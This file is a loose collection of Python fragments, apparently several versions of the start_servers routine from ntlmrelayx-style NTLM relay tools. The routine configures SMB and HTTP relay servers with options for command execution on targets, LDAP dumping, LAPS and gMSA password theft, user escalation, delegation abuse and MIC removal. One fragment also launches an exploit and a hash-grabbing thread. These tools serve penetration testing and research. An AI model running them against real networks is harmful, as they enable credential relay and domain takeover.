def start_servers(options, threads): for server in RELAY_SERVERS: #Set up config c = NTLMRelayxConfig() c.setProtocolClients(PROTOCOL_CLIENTS) c.setRunSocks(options.socks, socksServer) c.setTargets(targetSystem) c.setExeFile(options.e) c.setCommand(options.c) c.setEnumLocalAdmins(options.enum_local_admins) c.setEncoding(codec) c.setMode(mode) c.setAttacks(PROTOCOL_ATTACKS) c.setLootdir(options.lootdir) c.setOutputFile(options.output_file) c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user, options.add_computer, options.delegate_access, options.dump_laps, options.dump_gmsa, options.sid) c.setRPCOptions(options.rpc_mode, options.rpc_use_smb, options.auth_smb, options.hashes_smb, options.rpc_smb_port) c.setMSSQLOptions(options.query) c.setInteractive(options.interactive) c.setIMAPOptions(options.keyword, options.mailbox, options.all, options.imap_max) c.setIPv6(options.ipv6) c.setWpadOptions(options.wpad_host, options.wpad_auth_num) c.setSMB2Support(options.smb2support) c.setSMBChallenge(options.ntlmchallenge) c.setInterfaceIp(options.interface_ip) c.setExploitOptions(options.remove_mic, options.remove_target) c.setWebDAVOptions(options.serve_image) if server is HTTPRelayServer: c.setListeningPort(options.http_port) c.setDomainAccount(options.machine_account, options.machine_hashes, options.domain) elif server is SMBRelayServer: c.setListeningPort(options.smb_port) #If the redirect option is set, configure the HTTP server to redirect targets to SMB if server is HTTPRelayServer and options.r is not None: c.setMode('REDIRECT') c.setRedirectHost(options.r) #Use target randomization if configured and the server is not SMB if server is not SMBRelayServer and options.random: c.setRandomTargets(True) s = server(c) s.start() threads.add(s) return c
def start_servers(options, threads): for server in RELAY_SERVERS: #Set up config c = NTLMRelayxConfig() c.setProtocolClients(PROTOCOL_CLIENTS) c.setRunSocks(options.socks, socksServer) c.setTargets(targetSystem) c.setExeFile(options.e) c.setCommand(options.c) c.setEnumLocalAdmins(options.enum_local_admins) c.setEnumShares(options.enum_shares ) ### Handle CLI option for SMB share enumeration ### c.setEternalRelayAttack(options.eternalrelay) c.setEncoding(codec) c.setMode(mode) c.setAttacks(PROTOCOL_ATTACKS) c.setLootdir(options.lootdir) c.setOutputFile(options.output_file) c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user, options.add_computer, options.delegate_access) c.setMSSQLOptions(options.query) c.setInteractive(options.interactive) c.setIMAPOptions(options.keyword, options.mailbox, options.all, options.imap_max) c.setIPv6(options.ipv6) c.setWpadOptions(options.wpad_host, options.wpad_auth_num) c.setSMB2Support(options.smb2support) c.setInterfaceIp(options.interface_ip) if server is HTTPRelayServer: c.setListeningPort(options.http_port) elif server is SMBRelayServer: c.setListeningPort(options.smb_port) #If the redirect option is set, configure the HTTP server to redirect targets to SMB if server is HTTPRelayServer and options.r is not None: c.setMode('REDIRECT') c.setRedirectHost(options.r) #Use target randomization if configured and the server is not SMB #SMB server at the moment does not properly store active targets so selecting them randomly will cause issues if server is not SMBRelayServer and options.random: c.setRandomTargets(True) s = server(c) s.start() threads.add(s) return c
def start_servers(options, threads): for server in RELAY_SERVERS: #Set up config c = NTLMRelayxConfig() c.setProtocolClients(PROTOCOL_CLIENTS) c.setRunSocks(options.socks, socksServer) c.setTargets(targetSystem) c.setExeFile(options.e) c.setCommand(options.c) c.setEnumLocalAdmins(options.enum_local_admins) c.setEncoding(codec) c.setMode(mode) c.setAttacks(PROTOCOL_ATTACKS) c.setLootdir(options.lootdir) c.setOutputFile(options.output_file) c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user, options.add_computer, options.delegate_access) c.setMSSQLOptions(options.query) c.setInteractive(options.interactive) c.setIMAPOptions(options.keyword, options.mailbox, options.all, options.imap_max) c.setIPv6(options.ipv6) c.setWpadOptions(options.wpad_host, options.wpad_auth_num) c.setSMB2Support(options.smb2support) c.setInterfaceIp(options.interface_ip) if server is HTTPRelayServer: c.setListeningPort(options.http_port) elif server is SMBRelayServer: c.setListeningPort(options.smb_port) #If the redirect option is set, configure the HTTP server to redirect targets to SMB if server is HTTPRelayServer and options.r is not None: c.setMode('REDIRECT') c.setRedirectHost(options.r) #Use target randomization if configured and the server is not SMB #SMB server at the moment does not properly store active targets so selecting them randomly will cause issues if server is not SMBRelayServer and options.random: c.setRandomTargets(True) s = server(c) s.start() threads.add(s) return c
def start_servers(options, threads): for server in RELAY_SERVERS: #Set up config c = NTLMRelayxConfig() c.setProtocolClients(PROTOCOL_CLIENTS) c.setRunSocks(options.socks, socksServer) c.setTargets(targetSystem) c.setExeFile(options.e) c.setCommand(options.c) c.setEncoding(codec) c.setMode(mode) c.setAttacks(PROTOCOL_ATTACKS) c.setLootdir(options.lootdir) c.setOutputFile(options.output_file) c.setLDAPOptions(options.no_dump, options.no_da) c.setMSSQLOptions(options.query) c.setInteractive(options.interactive) c.setIMAPOptions(options.keyword, options.mailbox, options.all, options.imap_max) c.setIPv6(options.ipv6) c.setWpadOptions(options.wpad_host, options.wpad_auth_num) c.setSMB2Support(options.smb2support) c.setInterfaceIp(options.interface_ip) #If the redirect option is set, configure the HTTP server to redirect targets to SMB if server is HTTPRelayServer and options.r is not None: c.setMode('REDIRECT') c.setRedirectHost(options.r) #Use target randomization if configured and the server is not SMB #SMB server at the moment does not properly store active targets so selecting them randomly will cause issues if server is not SMBRelayServer and options.random: c.setRandomTargets(True) s = server(c) s.start() threads.add(s) return c
def startServers(passargs): targetSystem = passargs.target_host privuser = passargs.user PoppedDB = Manager().dict() # A dict of PoppedUsers PoppedDB_Lock = Lock() # A lock for opening the dict relayServers = (SMBRelayServer, HTTPRelayServer) serverThreads = [] for server in relayServers: c = NTLMRelayxConfig() c.setProtocolClients(PROTOCOL_CLIENTS) c.setTargets( TargetsProcessor(singleTarget=str("ldap://" + targetSystem), protocolClients=PROTOCOL_CLIENTS)) c.setOutputFile(None) c.setEncoding('ascii') c.setMode('RELAY') c.setAttacks(PROTOCOL_ATTACKS) c.setLootdir('.') c.setInterfaceIp("0.0.0.0") c.setLDAPOptions(True, True, True, privuser) c.PoppedDB = PoppedDB # pass the poppedDB to the relay servers c.PoppedDB_Lock = PoppedDB_Lock # pass the poppedDB to the relay servers s = server(c) s.start() serverThreads.append(s) logging.info("Relay servers started, waiting for connection....") status = exploit(passargs) if status: exp = Thread(target=gethash, args=(passargs, )) exp.daemon = True exp.start() try: while exp.isAlive(): pass except KeyboardInterrupt, e: logging.info("Shutting down...") for thread in serverThreads: thread.server.shutdown()
logging.getLogger('impacket.smbserver').setLevel(logging.ERROR) codec = sys.getdefaultencoding() targetSystem = TargetsProcessor(singleTarget=args.target, protocolClients=PROTOCOL_CLIENTS) threads = set() for server in RELAY_SERVERS: # Set up config c = NTLMRelayxConfig() c.setProtocolClients(PROTOCOL_CLIENTS) c.setRunSocks(False, None) c.setTargets(targetSystem) c.setEncoding(codec) c.setAttacks(ATTACKS) c.setOutputFile(args.out_file) c.setSMB2Support(True) c.setInterfaceIp('') if server == HTTPRelayServer: c.setMode('REFLECTION') else: c.setMode('REDIRECT') c.setRedirectHost(True) s = server(c) s.start() threads.add(s) print("")